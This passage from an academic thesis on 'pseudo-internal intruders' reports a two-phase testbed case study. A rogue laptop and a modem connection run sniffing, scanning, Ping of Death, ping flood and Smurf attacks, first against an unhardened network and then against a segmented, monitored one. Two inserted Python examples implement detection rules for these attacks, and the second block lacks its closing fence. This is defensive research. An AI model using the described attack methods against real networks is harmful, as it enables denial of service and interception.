4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop]
-
Result: Attack 4 was as successful as attack 3. In fact, the results were exactly the
same. The only difference between the two attacks is that a Windows program
was used to launch the attack from the laptop instead of using the ping command.
-
Footprint: The footprint for this attack was no different than that of attack 3. The
use of the program WinNuke instead of manually sending the abnormal size ping
packet makes no difference with respect to the network configuration.
5) Denial of Service Attack – Ping Flood [Laptop]
-
Result: The pseudo-internal intruder laptop on hub OP sent continuous ping
packets to node MCDS on hub MC. Nodes OAS and MCDW were observed to
no longer be able to reliably communicate with node MCDS because node MCDS
was too busy answering the pings from the laptop (intermittent communication
was possible). The ability of any node to communicate with any other node was
degraded because, with no segmentation, the hubs repeated every ping packet and
every reply to every port on the network.
-
Footprint: The footprint of attack 5 is similar to that of attacks 3 and 4. The
existence of the laptop on the network creates unauthorized MAC and IP address
usage. Likewise, there are servers (node OAS) with audit logs enabled that see
the ping packets, but do not record them since the pings are intended for another
machine. Node MCDS audit logs would also show all of the incoming ping
packets. The footprint was, however, more noticeable by all users of the network
because of the “sluggishness” created by the saturation of the network by ping
packets. There is no security tool in use for phase 1 of the case study that would
indicate a ping flood attack in progress, but it is likely that system administrators
would quickly realize there was something wrong with the network and
investigate further.
6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect]
-
Result: The results of this attack are similar to those of attack 5. Reliable
communication between node MCDS and any other node was not possible.
Communication for any node was degraded due to the saturation of the network
by ping packets. The difference between attacks 5 and 6 was the way in which
the attack was launched. Attack 6 was launched from the remote laptop
connected to node OWk3 via a modem. The pseudo-internal intruder remote
laptop sent ping packets to several other nodes. The ping packet was constructed
to appear as if node MCDS had sent it. Therefore, all of the nodes replied to node
MCDS. This process was repeated to create a continuous flow of ping packets
directed at node MCDS.
-
Footprint: Attack 6 has a larger footprint than the other attacks because several
nodes are receiving ping packets that appear to come from node MCDS. Thus,
servers with audit logs would record the numerous requests to respond to node
MCDS. As in attack 5, all users of the network would notice that the network was
“sluggish” and unresponsive. It would certainly be noticeable by observing the
audit logs of node MCDS, which would show a large number of incoming ping replies
to requests that node MCDS never sent.
4.6 Security Changes Made to Testbed System for Phase 2
In order to demonstrate the effectiveness of the security measures proposed by
this thesis, the following security changes were made to the testbed distributed system
prior to phase 2 of the case study. These are the changes advocated to mitigate the
consequences of a pseudo-internal intruder gaining access to a target system and to
detect, monitor, and record any intrusions. Specifically, the following
changes increase network configuration control and network
configuration monitoring. Denying the intruder access to the distributed system (physical
perimeter defense and physical configuration control) was not considered for the case
study.
To limit the unintended recipients of a given packet, the testbed distributed
system was divided into two segments. The first segment contained those nodes
connected to hub OP and represents the operational segment. The second
segment contained those nodes connected to hub MC and represents the
mission critical segment. Any packet crossing between the two halves was only
forwarded onto the segment that contained the recipient of the packet, so traffic for
one segment was no longer repeated onto both hubs. Also, in an effort to limit the unintended recipients of any mission critical packet,
all mission critical communication was encrypted. Likewise, all nodes were required to
use secure (encrypted) telnet and secure file transfer protocol.
A network intrusion detection monitoring device was inserted between the router
and hub MC to monitor and protect the mission critical segment. The device was actually
a router that contained a computer running Internet Security Systems’ (ISS) RealSecure
monitoring product. The network intrusion detection monitoring device was made by
ODS Networks Inc. [ODS97, ODS98]. Each packet that passes through the network
intrusion monitoring device was examined by the ISS RealSecure software. Each packet
was compared to a list of packets used to execute many known attacks. For example, if a
packet matched an oversized Ping of Death packet, then the packet would be discarded
and not allowed to pass through to the segment protected by the intrusion detection
monitoring device. The software also checks for attack patterns using multiple packets.
For example, the software will allow several consecutive ping packets for a single
machine to pass through, but too many consecutive ping packets would indicate a ping
flood attack and such packets would be blocked from passing the intrusion detection
monitoring device. Any suspicious packet activity found by the software is reported to
the system administrator via e-mail. If the system is unable to send e-mail, it dials the
system administrator’s digital pager using a modem connected to an outside phone line
(out-of-band).
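To make the device’s two kinds of check concrete, here is an added Python example (written for this edition; it is neither the thesis’s code nor RealSecure’s logic) that applies a single-fragment signature for the Ping of Death, a rate threshold for the ping flood, and a many-sources-to-one-target pattern for the Smurf attack to a constructed capture. The addresses, the one-second window, the thresholds and the assumption that an address ending in .255 is a directed broadcast are all inputs chosen for the example.

```python
"""Signature and rate checks of the kind the phase 2 intrusion detection device
applied to traffic entering the mission critical segment. Added example: it is
neither the thesis's code nor the RealSecure product's logic. The packet records,
addresses, thresholds and window length are all constructed assumptions."""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Tuple

ICMP = 1                     # IP protocol number
ECHO_REQUEST, ECHO_REPLY = 8, 0
IP_HEADER_LEN = 20           # assumes no IP options
MAX_DATAGRAM = 65535         # largest legal reassembled IPv4 datagram
BROADCAST_SUFFIX = ".255"    # directed broadcast of a /24; an assumption for this testbed


@dataclass(frozen=True)
class Packet:
    t: float                 # capture time in seconds
    src: str
    dst: str
    icmp_type: int = -1      # 8 request, 0 reply; -1 if not ICMP or not the first fragment
    proto: int = ICMP
    length: int = 84         # IP total length of this packet or fragment
    frag_offset: int = 0     # byte offset of this fragment within its datagram


def is_ping_of_death(p: Packet) -> bool:
    """True if this fragment's data would end beyond the 65535 byte limit of the
    reassembled datagram: the oversized ping that crashed unpatched Windows 95.
    The check is per fragment, so no reassembly state is needed."""
    return p.frag_offset + (p.length - IP_HEADER_LEN) > MAX_DATAGRAM


def analyze(packets: List[Packet], window: float = 1.0,
            flood_threshold: int = 50, smurf_sources: int = 3) -> List[Tuple[str, str]]:
    """Return sorted (alert, target) pairs for a packet sequence.

    ping_of_death  : oversized fragment addressed to target
    broadcast_ping : echo request to a broadcast address; target is the claimed
                     source, i.e. the host the replies will hit (Smurf setup)
    ping_flood     : more than flood_threshold echo requests to target per window
    smurf          : echo replies to target from smurf_sources distinct hosts per window
    """
    alerts = set()
    requests: Dict[str, Deque[float]] = defaultdict(deque)
    replies: Dict[str, Deque[Tuple[float, str]]] = defaultdict(deque)
    for p in sorted(packets, key=lambda q: q.t):
        if is_ping_of_death(p):
            alerts.add(("ping_of_death", p.dst))
        if p.proto != ICMP:
            continue
        if p.icmp_type == ECHO_REQUEST:
            if p.dst.endswith(BROADCAST_SUFFIX):
                alerts.add(("broadcast_ping", p.src))
            q = requests[p.dst]
            q.append(p.t)
            while q and p.t - q[0] > window:      # drop timestamps outside the window
                q.popleft()
            if len(q) > flood_threshold:
                alerts.add(("ping_flood", p.dst))
        elif p.icmp_type == ECHO_REPLY:
            r = replies[p.dst]
            r.append((p.t, p.src))
            while r and p.t - r[0][0] > window:
                r.popleft()
            if len({src for _, src in r}) >= smurf_sources:
                alerts.add(("smurf", p.dst))
    return sorted(alerts)


def sample_capture() -> List[Packet]:
    """Constructed capture: normal traffic plus attacks 3, 5 and 6 of the case study."""
    pkts = [Packet(0.00, "10.0.1.1", "10.0.2.1", ECHO_REQUEST),
            Packet(0.01, "10.0.2.1", "10.0.1.1", ECHO_REPLY)]
    # Attack 3/4: final fragment of an oversized ping, laptop -> MCDW.
    pkts.append(Packet(1.0, "10.0.1.50", "10.0.2.2", length=1500, frag_offset=65120))
    # Attack 5: 120 echo requests in under half a second, laptop -> MCDS.
    pkts += [Packet(2.0 + i * 0.004, "10.0.1.50", "10.0.2.1", ECHO_REQUEST)
             for i in range(120)]
    # Attack 6: request spoofed from MCDS to the operational broadcast address,
    # then the replies from the operational nodes converging on MCDS.
    pkts.append(Packet(4.0, "10.0.2.1", "10.0.1.255", ECHO_REQUEST))
    for i in range(20):
        for host in ("10.0.1.1", "10.0.1.2", "10.0.1.3"):
            pkts.append(Packet(4.0 + i * 0.01, host, "10.0.2.1", ECHO_REPLY))
    return pkts


if __name__ == "__main__":
    for kind, target in analyze(sample_capture()):
        print(f"{kind:15s} target={target}")
```

The fragment check needs no reassembly state because any fragment whose data ends past byte 65535 is illegal on its own. The thresholds are where a real sensor earns its keep: set too low, the periodic liveness pings recommended in section 3.4 look like a flood; set too high, a slow flood passes unreported.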
In an effort to increase network configuration monitoring, each segment has one
server that continuously scans for unauthorized MAC and IP address activity. A full
network assessment utility is periodically run as well to search for unknown and
unauthorized nodes. Likewise, an RMON (Remote Monitoring) compliant network
device monitoring utility is used on each segment. RMON is an SNMP-based standard for
communicating remote network management information over the network. The
monitoring utility queries the network device for information like which ports are in use,
what MAC addresses are using which port, and how much traffic is going through the
network device. Some RMON compliant software can even analyze this data for trends
or be configured to automatically notify the administrator when certain ports are in use or
when the overall network traffic reaches some level.
Figure 4-2: Network Configuration of Phase 2 Testbed System
4.7 Results of Attacks on Target System – Phase 2
The following section will discuss the results of executing the set of attacks against
the phase 2 target system.
1) Packet Sniffer – Software [Laptop]
-
Result: The packet sniffer was only able to capture the external POP Mail server
account name and password of the user of node OWk2. Since all communication
between mission critical nodes was encrypted, the packets containing the mission
critical text file and user account names and passwords were unreadable. Even if
communications between nodes MCDS and MCDW were not encrypted, the
sniffer would not capture them since packets not intended for nodes on segment 1
are not transmitted to segment 1 (where the laptop is connected).
-
Footprint: While the footprint is no different than it was in the first phase of the
case study, there were more security measures in place to detect such footprints.
The network administration server on the same segment as the laptop reported an
unidentified MAC address and IP address in use (the laptop). The periodic active
network assessment from node OAS also detected the laptop and reported on the
operating system and services it was running. From that information, the system
administrator on node OAS could conclude that there was an unidentified
machine in use on the segment. Furthermore, RMON compliant monitoring
software reported that an additional port on hub OP was in use. In this way the
system administrator could determine the physical location of the unauthorized
node visible on the network (by tracing the wiring from the unauthorized port on
hub OP). This was true for all attacks using the laptop, so it will not again be
mentioned in detail.
2) Network Assessment Tool – Active [Rogue Outside Connect]
-
Result: In most segmenting schemes, system administrators use different ranges
of IP addresses for different segments on the network. Without knowing the IP
address scheme, the intruder’s machine on one segment has no addresses at which to
aim packets on another segment. For this reason, the active network assessment tool was only
able to gain information about the nodes on the same segment as node OWk3.
Without knowledge of the IP addresses of nodes MCDS and MCDW (segment 2
nodes), there was no way to gain information about those nodes. Therefore, the
pseudo-internal intruder using the rogue outside connect had no way of knowing
what operating systems were in use by segment 2 (Mission Critical) nodes, and
what vulnerabilities segment 2 nodes might have. This protection is obscurity rather
than enforcement: an intruder who scans the neighboring address ranges, or who reads
the routing table of node OWk3, recovers the scheme, and the router will forward the
probes unless it is configured not to. The active assessment still
gained the same information as in the first phase of the case study about the nodes
on segment 1 (Operational). Furthermore, the network intrusion detection
monitoring device can be configured to deny some of the packets that contain
requests for information used by active network assessment tools, which is the
enforcement that the address scheme alone does not provide.
-
Footprint: As in the first phase of the case study, the audit logs active on node
OAS recorded the activities of the network assessment tool. As before, further
investigation as to why node OWk3 was requesting information from other
machines would lead the system administrator to discover the unauthorized
modem.
3) Exploit – Ping of Death [Laptop]
-
Result: This attack was totally unsuccessful in phase 2 of the case study. The
abnormal size ping packet sent from the laptop was stopped by the network
intrusion detection monitoring device protecting the mission critical segment of
hub MC. The device immediately reported, via e-mail to the system
administrator, that a Ping of Death attack had been attempted against node
MCDW. Node MCDW was never affected.
-
Footprint: Like the other attacks, the footprint of attack 3 was no different in
phase 2 of the case study. The difference is that measures had been put in place to
detect attack footprints. The network intrusion detection monitoring device
immediately reported the attack to the system administrator and narrowed the
source of the attack to the operational segment. The system administrator at node
OAS would then be able to employ the methods discussed in attack 1 to quickly
locate the unauthorized laptop.
4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop]
-
Result: The results were the same as those of attack 3.
-
Footprint: The footprint and the system’s ability to detect the footprint were the
same as in attack 3.
5) Denial of Service Attack – Ping Flood [Laptop]
- Result: Attack 5 was partially successful. When the pseudo-internal intruder
using the laptop attempted to ping flood node MCDS, the network intrusion
detection monitoring device stopped the flood of ping packets from reaching any
node on segment 2. Because of the segmenting of the network, the ability of
nodes to communicate with each other was not degraded as badly as in phase 1.
The ping packets are not rebroadcast by the gateway to all nodes on the network.
Consequently, the only interference is from the original ping packets from the
laptop to node MCDS. These ping packets were numerous enough to somewhat
degrade the operational segment nodes’ ability to communicate over the network.
The network intrusion detection monitoring device notified the system
administrator via an out-of-band page. Since the network intrusion detection
monitoring device is also a router, packets from node MCDS to node MCDW
were sent to the router and then back to node MCDW. These packets did not
have to go to the gateway since the router recognized the recipient as a mission
critical segment node and directed the packets back to MCDW. The attack did
not degrade the ability of mission critical segment nodes to communicate with
each other.
- Footprint: Once again, the footprint of attack 5 was the same as in phase 1, but
the network intrusion detection monitoring device recognized the ping flood and
reported the attack to the system administrator. As in the above attacks, the
administrator was able to locate the unauthorized laptop.
6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect]
- Result: The results of attack 6 were similar to those of attack 5. The first several
pings from nodes on segment 1 were allowed through to node MCDS, but the
network intrusion detection monitoring device blocked most of the remaining
pings as soon as it recognized a Smurf ping flood attack. Additionally,
attempts to use any node on segment 2 as a Smurf relay (the node sending out a
ping to the target) failed because the network intrusion detection monitoring
device stopped all attempts to use those machines as Smurf relays. These
incidents were reported to the system administrator immediately.
- Footprint: The footprint was the same as in phase 1, but like the previous attacks,
the system administrator was able to use the information sent by the network
intrusion detection monitoring device to locate the unauthorized laptop.
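The behaviour the case study attributes to the network intrusion detection monitoring device in attacks 3 through 6 (stopping the oversized ping, recognizing the ping flood, refusing to let segment 2 nodes act as Smurf relays, and reporting each event) can be sketched as a handful of traffic rules. The following is an added example written for this page; it is not the thesis's testbed configuration and not the ODS router or RealSecure product. The Packet record, the thresholds, the addresses, the one-second windows and the assumption that every segment is a /24 (so a .255 address is its broadcast) are all constructed for illustration.

```python
"""Added example: three network-monitor rules matching the footprints seen in
phase 2 of the case study (oversized ICMP datagram, echo-request flood from one
source, Smurf broadcast request and reply storm). Illustrative code only, not
the ODS/RealSecure device used in the thesis; addresses, thresholds and the
packet records below are constructed."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    ts: float        # seconds since capture start (constructed)
    src: str
    dst: str
    proto: str       # "icmp", "tcp", "udp"
    icmp_type: int   # 8 = echo request, 0 = echo reply, -1 = not ICMP
    length: int      # reassembled IP datagram length in bytes


MAX_IP_DATAGRAM = 65535     # a reassembled datagram larger than this is malformed
FLOOD_THRESHOLD = 50        # echo requests from one source to one target per window (assumed)
SMURF_MIN_SOURCES = 10      # distinct reply sources converging on one target per window (assumed)
WINDOW_SECONDS = 1.0        # fixed window; a real device would tune all of these


def is_broadcast(addr: str) -> bool:
    """Constructed convention: every testbed segment is a /24, so .255 is its broadcast."""
    return addr.endswith(".255")


def detect(packets):
    """Return a list of alert dicts for the three footprints, in detection order."""
    alerts = []
    requests = defaultdict(int)          # (src, dst, window) -> echo-request count
    reply_sources = defaultdict(set)     # (dst, window) -> set of echo-reply sources

    for p in packets:
        if p.proto != "icmp":
            continue
        window = int(p.ts // WINDOW_SECONDS)

        # Rule 1: Ping of Death. Report the malformed datagram regardless of rate;
        # the monitoring device would also drop it before it reaches the segment.
        if p.length > MAX_IP_DATAGRAM:
            alerts.append({"rule": "ping_of_death", "src": p.src, "dst": p.dst,
                           "length": p.length})
            continue

        if p.icmp_type == 8:
            # Rule 3a: an echo request to a broadcast address is what primes a Smurf
            # relay; a monitor on the segment refuses to forward it and reports it.
            if is_broadcast(p.dst):
                alerts.append({"rule": "smurf_broadcast_request",
                               "spoofed_src": p.src, "dst": p.dst})
            else:
                requests[(p.src, p.dst, window)] += 1
        elif p.icmp_type == 0:
            reply_sources[(p.dst, window)].add(p.src)

    # Rule 2: echo-request flood from one source toward one target.
    for (src, dst, window), n in sorted(requests.items()):
        if n >= FLOOD_THRESHOLD:
            alerts.append({"rule": "icmp_echo_flood", "src": src, "dst": dst,
                           "window": window, "count": n})

    # Rule 3b: many hosts replying to the same node in one window is the receiving
    # side of a Smurf attack (the victim's address was spoofed in the request).
    for (dst, window), sources in sorted(reply_sources.items()):
        if len(sources) >= SMURF_MIN_SOURCES:
            alerts.append({"rule": "smurf_reply_storm", "target": dst,
                           "window": window, "sources": len(sources)})
    return alerts


def sample_traffic():
    """Constructed packet records: ordinary pings, one oversized ping, a flood,
    and a Smurf primed against 10.2.0.8 via segment 1's broadcast address."""
    pk = []
    for i in range(5):                                   # normal administrative pings
        pk.append(Packet(float(i), "10.1.0.5", "10.2.0.9", "icmp", 8, 84))
    pk.append(Packet(6.0, "10.1.0.77", "10.2.0.9", "icmp", 8, 65_600))   # ping of death
    for i in range(60):                                  # flood inside one window
        pk.append(Packet(10.0 + i / 100, "10.1.0.77", "10.2.0.8", "icmp", 8, 84))
    pk.append(Packet(20.0, "10.2.0.8", "10.1.0.255", "icmp", 8, 84))    # spoofed broadcast ping
    for i in range(12):                                  # amplified replies hit the victim
        pk.append(Packet(20.1 + i / 100, f"10.1.0.{10 + i}", "10.2.0.8", "icmp", 0, 84))
    pk.append(Packet(21.0, "10.1.0.5", "10.2.0.9", "tcp", -1, 1500))    # non-ICMP, ignored
    return pk


if __name__ == "__main__":
    for alert in detect(sample_traffic()):
        print(alert)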
4.8
Summary
Although not a large, real world distributed system, the testbed system was
sufficient to illustrate the differences between state of practice and state of art security
measures with respect to pseudo-internal intruders. The hardware that comprised the
testbed system was diverse enough to be representative of the types of devices and
machines found in a majority of distributed systems. The scalability of the testbed
system, the fact that the testbed system could be the backbone of a thousand node system,
made the testbed system representative of large real world distributed systems.
The results of the first phase of the case study showed many of the network
related vulnerabilities still present in a distributed system with state of practice security
measures. State of practice security often does not provide internal access control for
The Pseudo-Internal Intruder
73
users of the network. While security measures are in place to prevent unauthorized
external access to the network, anyone inside the network perimeter can connect a device
to the network with little difficulty. Nor did the testbed system have any network traffic
control mechanisms. At no point inside the network perimeter was network traffic
examined for authenticity (from a legitimate internal node) or danger to the network
(Ping of Death packet, etc.). Lastly, state of practice security makes little effort to
monitor the internal network for intruders. Such state of practice security depends upon
network perimeter defenses to keep intruders out of the system and host based internal
intruder detection packages to detect unauthorized actions by users. After executing the
set of pseudo-internal intruder attacks, it was apparent that a pseudo-internal intruder can
do great damage by exploiting the vulnerabilities found in a distributed system with only
state of practice security.
For the second phase, the security recommendations for combating the pseudointernal intruder were implemented prior to executing the set of attacks. Comparing the
results of the attacks from the two phases, it is apparent that network configuration
control and network configuration monitoring help mitigate the threat of the pseudointernal intruder. For each attack, the success of the attack decreased and the ability of
the system administrator to detect the footprint increased in phase 2.
Network configuration control measures make it more difficult for pseudointernal intruders to access the system. Such measures also decrease the ability of
pseudo-internal intruders who do gain access to the system to gather information or do
harm to the distributed system. Network configuration monitoring mitigates the danger
of pseudo-internal intruders by promptly notifying the system administrator of intruders.
The Pseudo-Internal Intruder
74
The results of the case study make it clear that through network configuration control and
network configuration monitoring, system administrators can greatly decrease the
possibility of and the danger of the pseudo-internal intruder.
The Pseudo-Internal Intruder
75
Chapter 5: Conclusions and Future Work
5.1
Conclusions
This thesis has defined a new access oriented intruder category: the pseudo-
internal intruder. We have defined the pseudo-internal intruder as a new distinct
category, as opposed to a subcategory, after examining it with respect to internal and
external intruders in modern distributed systems. We have examined the tools and
techniques usable by the pseudo-internal intruder as well as the danger such an intruder
represents to a distributed system. Finally, we discussed an overall strategy for defending
a distributed system against a pseudo-internal intruder and offered a case study as an
example of how that defensive strategy can be implemented.
It is clear that others in the intrusion detection field are concerned about internal
network based attacks. Some intrusion detection system developers have started to
address the question of network intrusions. There are several network intrusion detection
systems that address the issue of intrusions via the internal network of a distributed
system, as opposed to external intrusion attempts or user account misuse. NetSTAT, an
extension of the State Transition Analysis Technique (STAT), was created because
developers realized that network attacks “may be totally invisible from the audit trail
(traditional intrusion detection) produced by the attacked host” [STA99]. Instead of
focusing on nodes, NetSTAT used the “the network and its protocols” (network
configuration) as its source of security related information [KV98]. Likewise, the ODS
router and RealSecure software package used in the case study provides a network
oriented intrusion detection system [ODS98]. There are currently multiple network
intrusion detection efforts underway including [HF98] and [MHL94], among others.
The Pseudo-Internal Intruder
76
While some of these network intrusion detection systems offer very promising
results, few of the efforts made an attempt to formally define the scope of the network
based intrusion problem. The existence of these ‘new’ efforts indicates an acceptance of
a ‘new’ intruder problem. Any definition of this ‘new’ intruder problem will aid
developers in efficiently and effectively addressing the problem.
The pseudo-internal intruder category addresses an area of potential intrusions
that did not exist prior to the proliferation of the networked distributed system. The
pseudo-internal intruder category provides intrusion detection developers a platform on
which to understand and define the capabilities of the pseudo-internal intruder, thereby
facilitating the detection and defense against such intruders.
5.3
Future Work
When Anderson defined the internal and external categories the principle defining
aspect of intruder threats was whether the intruder was “authorized to use the computer
system” [And80]. This thesis has argued that an additional defining aspect of intruder
threat is whether the intruder has direct access to the internal network of a system. This
additional defining aspect came into existence because of changing technology since the
early 1980s. Therefore, it is possible that technology yet to be developed or yet to
become mainstream will force a reexamination of the defining aspects of intruder threats.
Such developing technology could force the further refinement of intruder categorization,
resulting in more than three access oriented intruder categories.
The Pseudo-Internal Intruder
77
References
[AFV95]
Anderson, Debra, Than Frivold, and Alfonso Valdes. “Next Generation
Intrusion Detection Expert System (NIDES): A Summary.” SRI
International. May 1995.
[AKS96]
Aslam, Taimur, Ivan Krsul, and Eugene H. Spafford. “Use of A
Taxonomy of Security Faults.” Purdue University Technical Report,TR96-051. September 1996.
[AN96]
Abadi, Martin, and Roger Needham. “Prudent Engineering Practice for
Cryptographic Protocols.” IEEE Transations on Software Engineering, 22
(1). January 1996. 6-15.
[And80]
Anderson, James P. “Computer Security Threat Monitoring and
Surveillance.” James P. Anderson Co. February 1980.
[And85]
Anderson, James P. “A Unification of Computer and Network Security
Concepts.” IEEE Proceedings of the 1985 Symposium on Security and
Privacy. April 1985. 77-87.
[And93]
Anderson, Ross. “Why Cryptosystems Fail.” 1st ACM Conference on
Computer and Communications Security. 1993.
[Bar98]
Barnes, Bruce H. “Computer Security Research: A British Perspective.”
IEEE Software. IEEE Computer Society. September/October 1998. 3033.
[Bou98]
Boulander, A. “Catapults and Grappling Hooks: The Tools and
Techniques of Information Warfare.” IBM Systems Journal, 37(1). 1998.
106-114.
The Pseudo-Internal Intruder
78
[CH96]
Cannady, J. and J. Harrell. “A Comparative Analysis of Current Intrusion
Detection Technologies.” 4th Technology for Information Security
Conference. May 1996.
[CER94]
1994 CERT Coordination Center Annual Report.
http://www.cert.org/annual_rpts/cert_rpt_94.html
[CER98]
1998 CERT Coordination Center Annual Report.
http://www.cert.org/annual_rpts/cert_rpt_98.html
[CNE96]
“Ping of Death Averted.” CNET News.com. November 25, 1996.
[CNN99]
“E-mail Virus Threatens.” Cable News Network. March 29, 1999.
[Den83]
Denning, Dorothy E. “Protecting Public Keys and Signature Keys.”
Computer. IEEE Computer Society. February 1983. 27-35.
[Den87]
Denning, Dorothy E. “An Intrusion-Detection Model.” IEEE Transations
on Software Engineering, SE-13(2). February 1987. 222-232.
[Den99]
Denning, Dorothy E. Information Warfare and Security. AddisonWesley. 1999.
[DM98]
Dowd, Patrick W. and John T. Henry. “Network Security: It’s Time to
Take It Seriously.” Computer. IEEE Computer Society. September 1998.
24-28.
[DV97]
Davis, B. and B. Violino. “Security: Window of Vulnerability.”
Information Week. March 10, 1997.
The Pseudo-Internal Intruder
79
[Eck85]
Eck, Wim van. “Electromagnetic Radiation from Video Display Units:
An Eavesdropping Risk?” Computers & Security 4. Elsevier Science
Publishers B.V. 1985. 269-286.
[FOL99]
Free On-Line Dictionary of Computing. 1999.
Http://wombat.doc.ic.ac.uk/foldoc/index.html
[GAO96]
“Information Security: Computer Attacks at Department of Defense Pose
Increasing Risks.” General Accounting Office Chapter Report, AIMD-9684. May 1996.
[Gri95]
Griffiths, B. “Optical Fibre Security Systems: Applications for Intrusion
Detection.” Glass Technology, 36(5). October 1995. 150-152.
[HF98]
Hofmeyr, Steven A. and Stephanie Forrest. “Immunizing Computer
Networks: Getting All the Machines in Your Network to Fight the Hacker
Disease.” Submitted to: 1999 IEEE Symposium on Security and Privacy.
November 1998.
[ISV95]
Icove, David, Karl Seger, and William VonStorch. Computer Crime: A
Crimefighter’s Handbook. O’Reilly & Associates. 1995.
[IKP95]
Ilgun, Koral, Richard A. Kemmerer, and Phillip A. Porras. “State
Transition Analysis: A Rule-Based Intrusion Detection Approach.” IEEE
Transations on Software Engineering, 21(3). March 1995. 181-199.
[JS99]
Jones, Anita, and Robert Sielken. “Intrusion Detection.” University of
Virginia Technical Report. May 1999.
The Pseudo-Internal Intruder
80
[KV98]
Kemmerer, R. and G. Vigna, "NetSTAT: A network-based intrusion
detection approach," Proceedings of the 14th Annual Computer Security
Applications Conference. December 1998.
[Kor97]
Kornblum, Janet. “Microsoft Posts Another Bug Fix.” CNET News.com.
July 1, 1997.
[LG97]
Landwehr, Carl E. and David M. Goldschlag. “Security Issues in
Networks with Internet Access.” Proceedings of the IEEE, 85(12).
December 1997. 2034-2051.
[LS90]
Lu, Wen-Pai, and Malur K. Sundareshan. “A Model for Multilevel
Security in Computer Networks.” IEEE Transations on Software
Engineering, 16(6). June 1990. 647-659.
[Lun93]
Lunt, T.F. “A survey of Intrusion Detection Techniques.” Computer &
Security 12. 1993. 405-418.
[Mei99]
Meier, Garry. “Off the Record: A Survey of Top INFOSEC Execs in
Banking.” Electronic Trust: The Magazine of Information Security
Trends. Q1, 1999.
[MHL94]
Mukherjee, B., L. T. Heberlein, and K. N. Levitt. “Network Intrusion
Detection.” IEEE Network. May/June 1994. 26-41.
[Nes87]
Nessett, Dan M. “Factors Affecting Distributed System Security.” IEEE
Transations on Software Engineering, SE-13(2). February 1987. 233248.
The Pseudo-Internal Intruder
81
[Neu98]
Neumann, Peter G. “Security, Survivability, Risks, etc.” Invited Lecturer.
Department of Computer Science, University of Virginia. November 19,
1998.
[ODS97]
“Leading Security Companies Partner to Deliver New Class of Network
Security Service.” ODS Networks Press Release. September 30, 1997.
[ODS98]
“Evaluating Your Network’s Security.” ODS Networks. April 1998.
Http://www.ods.com/white/whi_0004.shtml
[PCO97]
Puketza, Nicholas, Mandy Chung, and Ronald A. Olsson. “A Software
Platform for Testing Intrusion Detection Systems.” IEEE Software.
September/October 1997. 43-50.
[Pow99]
Power, Richard. “1999 CSI/FBI Computer Crime and Security Survey.”
Computer Security Journal, XV(2). 29-45.
[PZ+96]
Puketza, Nicholas, Kui Zhang, Mandy Chung, Biswanath Mukherjee, and
Ronald A. Olsson. “A Methodology for Testing Intrusion Detection
Systems. IEEE Transations on Software Engineering, 22(10). October
1996. 719-729.
[Reu98a]
“China Foils Cyber Bank Robbers.” Reuters Limited. October 22, 1998.
[Reu98b]
“Chinese Crackers Get Death.” Reuters Limited. December 28, 1998.
[Sch96]
Schneier, Bruce. Applied Cryptography, Second Edition. John Wiley &
Sons Inc. 1996.
The Pseudo-Internal Intruder
82
[Sel90]
Seline, Christopher. “Eavesdropping on the Electromagnetic Emanations
of Digital Equipment: The Law of Canada, England, and the United
States.” June 1990.
[Spa96]
Spafford, Eugene H. Security Seminar. Department of Computer Science,
Purdue University. January 1996.
[SRI97]
“What is NIDES?” SRI International / Computer Science Laboratory.
Http://www.csl.sri.com/nides/index1.html
[STA99]
“Projects: The STAT Approach.” Reliable Software Group at University
of California at Santa Barbara.
Http://www.cs.ucsb.edu/~kemm/netstat.html/projects.html
[Sun96]
Sundaram, Aurobindo. “An Introduction to Intrusion Detection.” ACM
Crossroads, 2(4). 1996.
[Tan96]
Tanenbaum, Andrew S. Computer Networks, Third Edition. Prentice
Hall. 1996.
[Win97]
Wingfield, Nick. “Hole in Windows 95, NT fixed.” CNET News.com.
May 12, 1997.
The Pseudo-Internal Intruder
Download